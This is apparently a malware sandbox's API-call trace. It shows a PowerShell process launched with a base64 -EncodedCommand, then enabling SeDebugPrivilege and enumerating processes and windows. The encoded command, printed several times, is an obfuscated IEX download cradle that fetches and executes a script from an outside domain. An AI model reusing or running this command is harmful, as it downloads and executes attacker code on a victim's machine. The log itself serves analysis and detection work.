	[0358.506] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c7ade40 | out: pNumArgs=0x1c7ade40) returned 0x1b766bf0*=""
	[0358.507] lstrlenW (lpString="-EncodedCommand") returned 15
	[0358.508] CoTaskMemAlloc (cb=0x22) returned 0x4524c0
	[0358.508] RtlMoveMemory (in: Destination=0x4524c0, Source=0x1b766c12, Length=0x20 | out: Destination=0x4524c0) 
	[0358.508] CoTaskMemFree (pv=0x4524c0) 
	[0358.508] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0358.508] CoTaskMemAlloc (cb=0x2f4) returned 0x1b7402d0
	[0358.508] RtlMoveMemory (in: Destination=0x1b7402d0, Source=0x1b766c32, Length=0x2f2 | out: Destination=0x1b7402d0) 
	[0358.508] CoTaskMemFree (pv=0x1b7402d0) 
	[0358.509] LocalFree (hMem=0x1b766bf0) returned 0x0
	[0358.510] CoTaskMemAlloc (cb=0x804) returned 0x1b75e380
	[0358.510] GetConsoleTitleW (in: lpConsoleTitle=0x1b75e380, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0358.510] CoTaskMemFree (pv=0x1b75e380) 
	[0358.520] CoTaskMemAlloc (cb=0x38e) returned 0x1b766bf0
	[0358.520] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c7adda0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30738d0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x30738d0*(hProcess=0x360, hThread=0x35c, dwProcessId=0x308, dwThreadId=0x56c)) returned 1
	[0358.634] CoTaskMemFree (pv=0x1b766bf0) 
	[0358.635] CloseHandle (hObject=0x35c) returned 1
	[0358.635] CoTaskMemAlloc (cb=0x3b) returned 0x1b75a3e0
	[0358.635] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7ade48, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7ade48) returned 0x4550
	[0358.636] CoTaskMemFree (pv=0x1b75a3e0) 
	[0358.639] GetCurrentProcess () returned 0xffffffffffffffff
	[0358.639] GetCurrentProcess () returned 0xffffffffffffffff
	[0358.639] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x360, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7adf28, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7adf28*=0x35c) returned 1

Process:
	id = "23"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2014a000"
	os_pid = "0x3b0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 125
	os_tid = 0xac0

	[0360.716] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0360.965] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0360.966] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0360.966] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0360.966] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0362.025] GetVersionExW (in: lpVersionInformation=0x14db60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14db60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0362.027] GetVersionExW (in: lpVersionInformation=0x14db60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14db60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0362.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0362.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0362.040] GetVersionExW (in: lpVersionInformation=0x14d8d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d8d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0362.040] SetErrorMode (uMode=0x1) returned 0x1
	[0362.041] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14da30 | out: lpFileInformation=0x14da30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0362.042] SetErrorMode (uMode=0x1) returned 0x1
	[0362.046] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14dca0 | out: lpdwHandle=0x14dca0) returned 0x94c
	[0362.047] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2a972d8 | out: lpData=0x2a972d8) returned 1
	[0362.211] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14dc18, puLen=0x14dc10 | out: lplpBuffer=0x14dc18*=0x2a97374, puLen=0x14dc10) returned 1
	[0362.214] lstrlenW (lpString="䅁") returned 1
	[0362.222] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14db88, puLen=0x14db80 | out: lplpBuffer=0x14db88*=0x2a97450, puLen=0x14db80) returned 1
	[0362.223] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0362.225] CoTaskMemAlloc (cb=0x2e) returned 0x41fbe0
	[0362.225] lstrcpyW (in: lpString1=0x41fbe0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0362.226] CoTaskMemFree (pv=0x41fbe0) 
	[0362.226] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14db88, puLen=0x14db80 | out: lplpBuffer=0x14db88*=0x2a974a4, puLen=0x14db80) returned 1
	[0362.226] lstrlenW (lpString="System.Management.Automation") returned 28
	[0362.226] CoTaskMemAlloc (cb=0x3c) returned 0x41b3c0
	[0362.226] lstrcpyW (in: lpString1=0x41b3c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0362.226] CoTaskMemFree (pv=0x41b3c0) 
	[0362.227] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14db88, puLen=0x14db80 | out: lplpBuffer=0x14db88*=0x2a97500, puLen=0x14db80) returned 1
	[0362.227] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0362.227] CoTaskMemAlloc (cb=0x20) returned 0x4227c0
	[0362.227] lstrcpyW (in: lpString1=0x4227c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0362.227] CoTaskMemFree (pv=0x4227c0) 
	[0362.227] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14db88, puLen=0x14db80 | out: lplpBuffer=0x14db88*=0x2a97540, puLen=0x14db80) returned 1
	[0362.227] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0362.227] CoTaskMemAlloc (cb=0x44) returned 0x41b3c0
	[0362.227] lstrcpyW (in: lpString1=0x41b3c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0362.227] CoTaskMemFree (pv=0x41b3c0) 
	[0362.227] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14db88, puLen=0x14db80 | out: lplpBuffer=0x14db88*=0x2a975a8, puLen=0x14db80) returned 1
	[0362.227] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0362.227] CoTaskMemAlloc (cb=0x76) returned 0x3c31a0
	[0362.227] lstrcpyW (in: lpString1=0x3c31a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0362.227] CoTaskMemFree (pv=0x3c31a0) 
	[0362.227] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14db88, puLen=0x14db80 | out: lplpBuffer=0x14db88*=0x2a97644, puLen=0x14db80) returned 1
	[0362.227] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0362.227] CoTaskMemAlloc (cb=0x44) returned 0x41b3c0
	[0362.227] lstrcpyW (in: lpString1=0x41b3c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0362.227] CoTaskMemFree (pv=0x41b3c0) 
	[0362.227] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14db88, puLen=0x14db80 | out: lplpBuffer=0x14db88*=0x2a976a8, puLen=0x14db80) returned 1
	[0362.227] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0362.227] CoTaskMemAlloc (cb=0x58) returned 0x376b50
	[0362.227] lstrcpyW (in: lpString1=0x376b50, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0362.227] CoTaskMemFree (pv=0x376b50) 
	[0362.227] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14db88, puLen=0x14db80 | out: lplpBuffer=0x14db88*=0x2a97724, puLen=0x14db80) returned 1
	[0362.227] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0362.227] CoTaskMemAlloc (cb=0x20) returned 0x4227c0
	[0362.227] lstrcpyW (in: lpString1=0x4227c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0362.227] CoTaskMemFree (pv=0x4227c0) 
	[0362.228] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14db88, puLen=0x14db80 | out: lplpBuffer=0x14db88*=0x2a973cc, puLen=0x14db80) returned 1
	[0362.228] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0362.228] CoTaskMemAlloc (cb=0x66) returned 0x40df80
	[0362.228] lstrcpyW (in: lpString1=0x40df80, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0362.228] CoTaskMemFree (pv=0x40df80) 
	[0362.228] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14db88, puLen=0x14db80 | out: lplpBuffer=0x14db88*=0x0, puLen=0x14db80) returned 0
	[0362.228] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14db88, puLen=0x14db80 | out: lplpBuffer=0x14db88*=0x0, puLen=0x14db80) returned 0
	[0362.228] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14db88, puLen=0x14db80 | out: lplpBuffer=0x14db88*=0x0, puLen=0x14db80) returned 0
	[0362.228] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14db58, puLen=0x14db50 | out: lplpBuffer=0x14db58*=0x2a97374, puLen=0x14db50) returned 1
	[0362.229] CoTaskMemAlloc (cb=0x204) returned 0x3c96b0
	[0362.229] VerLanguageNameW (in: wLang=0x0, szLang=0x3c96b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0362.230] CoTaskMemFree (pv=0x3c96b0) 
	[0362.230] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\", lplpBuffer=0x14dba8, puLen=0x14dba0 | out: lplpBuffer=0x14dba8*=0x2a97300, puLen=0x14dba0) returned 1
	[0362.236] GetCurrentProcessId () returned 0x3b0
	[0362.446] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14cad0 | out: lpLuid=0x14cad0*(LowPart=0x14, HighPart=0)) returned 1
	[0362.448] GetCurrentProcess () returned 0xffffffffffffffff
	[0362.449] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x14caf0 | out: TokenHandle=0x14caf0*=0x2e8) returned 1
	[0362.450] AdjustTokenPrivileges (in: TokenHandle=0x2e8, DisableAllPrivileges=0, NewState=0x2a9ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0362.451] CloseHandle (hObject=0x2e8) returned 1
	[0362.455] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3b0) returned 0x2e8
	[0362.466] EnumProcessModules (in: hProcess=0x2e8, lphModule=0x2a9abb8, cb=0x200, lpcbNeeded=0x14db08 | out: lphModule=0x2a9abb8, lpcbNeeded=0x14db08) returned 1
	[0362.469] GetModuleInformation (in: hProcess=0x2e8, hModule=0x13f370000, lpmodinfo=0x2a9ae28, cb=0x18 | out: lpmodinfo=0x2a9ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0362.470] CoTaskMemAlloc (cb=0x804) returned 0x426b10
	[0362.470] GetModuleBaseNameW (in: hProcess=0x2e8, hModule=0x13f370000, lpBaseName=0x426b10, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0362.470] CoTaskMemFree (pv=0x426b10) 
	[0362.471] CoTaskMemAlloc (cb=0x804) returned 0x426b10
	[0362.471] GetModuleFileNameExW (in: hProcess=0x2e8, hModule=0x13f370000, lpFilename=0x426b10, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0362.471] CoTaskMemFree (pv=0x426b10) 
	[0362.472] CloseHandle (hObject=0x2e8) returned 1
	[0362.480] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x3b0) returned 0x2e8
	[0362.481] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0x14dc38 | out: lpExitCode=0x14dc38*=0x103) returned 1
	[0362.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12a9b088, Length=0x20000, ResultLength=0x14dc00 | out: SystemInformation=0x12a9b088, ResultLength=0x14dc00*=0x1dc10) returned 0x0
	[0362.579] EnumWindows (lpEnumFunc=0x22266ac, lParam=0x0) returned 1
	[0362.580] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.580] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x558
	[0362.580] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.580] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.580] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.581] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x538
	[0362.581] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.581] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x778
	[0362.581] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x778
	[0362.581] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.581] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.581] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.581] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.581] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.581] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.582] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.582] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.582] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x460
	[0362.582] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.582] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.582] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xe34
	[0362.582] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xea4
	[0362.582] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x514
	[0362.582] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xe48
	[0362.582] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xbc8
	[0362.582] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xdf8
	[0362.583] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x318
	[0362.583] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xcac
	[0362.583] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x8bc
	[0362.583] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xf9c
	[0362.583] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xf48
	[0362.583] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xe40
	[0362.583] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xecc
	[0362.583] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xeb8
	[0362.583] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xe80
	[0362.583] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xe98
	[0362.584] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xe60
	[0362.584] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xee4
	[0362.584] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xf00
	[0362.584] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xdf0
	[0362.584] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xe1c
	[0362.584] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xdd0
	[0362.584] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xd94
	[0362.584] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xd74
	[0362.584] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xd00
	[0362.584] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xcd8
	[0362.585] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xc84
